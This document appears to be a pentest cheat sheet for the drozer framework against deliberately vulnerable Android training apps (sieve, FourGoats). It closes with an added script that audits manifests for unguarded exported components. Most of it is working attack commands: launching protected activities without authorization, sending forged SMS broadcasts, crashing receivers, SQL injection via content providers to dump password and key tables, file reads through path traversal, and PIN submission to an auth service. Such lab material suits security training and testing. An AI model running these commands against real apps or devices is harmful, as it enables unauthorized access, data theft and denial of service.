0x00 Installing drozer
Windows:
Download the MSI installer from GitHub and run it; install it under python27 on the local disk.
pip install protobuf pyOpenSSL Twisted service_identity
Download the drozer agent:
https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb.exe install drozer-agent.apk
adb.exe install test.apk
Open drozer-agent on the device and enable it.
adb forward tcp:31415 tcp:31415
cd C:\python27\scripts
drozer console connect
0x01 Activity
The PWList activity has exported set to true, so it is at risk of being exported to other apps.
Unauthorized access
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
0x02 Broadcast
The receiver's exported attribute is not set, so it can be abused.
Sending a malicious broadcast
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --extra string phoneNumber 1234 --extra string message pwnd
DoS: causing a crash
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS
0x03 Service
exported is not set to false, so the service can be exported by default.
Start the GPS location service.
run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService
0x04 Content
List the accessible content URIs and paths:
SQL injection:
0x05 Related commands
run scanner.provider.finduris -a com.mwr.example.sieve
run app.service.info -a org.owasp.goatdroid.fourgoats
run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
run scanner.provider.injection -a com.mwr.example.sieve
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data
run app.provider.info -a com.mwr.example.sieve
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 0 --extra string com.mwr.example.sieve.PIN 1234 --bundle-as-obj
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection "* from Passwords;--"
run scanner.provider.traversal -a com.mwr.example.sieve
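The exported-component findings in 0x01 to 0x04 can also be checked from the developer's side before release. The script below is an added example, not part of the original notes or of drozer: it audits a decoded AndroidManifest.xml (text XML, for instance as produced by apktool) and reports components that are exported, explicitly or by platform default, without any permission guard. The sample manifest, package name and the target_sdk parameter are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
TAGS = ("activity", "activity-alias", "receiver", "service", "provider")

# Constructed sample manifest (not taken from sieve or FourGoats).
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.demo">
  <application>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".Settings"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter><action android:name="com.example.demo.SOCIAL_SMS"/></intent-filter>
    </receiver>
    <service android:name=".LocationService" android:exported="true"
             android:permission="com.example.demo.BIND"/>
    <provider android:name=".DBProvider" android:authorities="com.example.demo.db"/>
  </application>
</manifest>"""

def is_exported(elem, target_sdk):
    """Effective exported state: the explicit attribute wins, else the platform default."""
    explicit = elem.get(ANDROID + "exported")
    if explicit is not None:
        return explicit == "true"
    if elem.tag == "provider":
        return target_sdk <= 16  # providers defaulted to exported up to API 16
    # Other components are exported by default only when they declare an intent filter.
    return elem.find("intent-filter") is not None

def audit(manifest_xml, target_sdk=30):
    """Return (tag, name, reason) for exported components with no permission guard."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    for elem in app.iter():
        if elem.tag not in TAGS or not is_exported(elem, target_sdk):
            continue
        # Simplification: any declared permission counts as a guard; its
        # protectionLevel (and read-only vs write-only provider guards) is not checked.
        guards = [elem.get(ANDROID + a) for a in ("permission", "readPermission", "writePermission")]
        if any(guards) or app.get(ANDROID + "permission"):
            continue
        reason = "explicit" if elem.get(ANDROID + "exported") else "implicit default"
        findings.append((elem.tag, elem.get(ANDROID + "name"), reason))
    return findings

if __name__ == "__main__":
    for tag, name, reason in audit(SAMPLE):
        print(f"{tag:9} {name:18} exported ({reason}), no permission required")
```

Each reported component should either get android:exported="false" or a permission with an appropriate protection level, and any exported receiver still needs to validate its Intent extras.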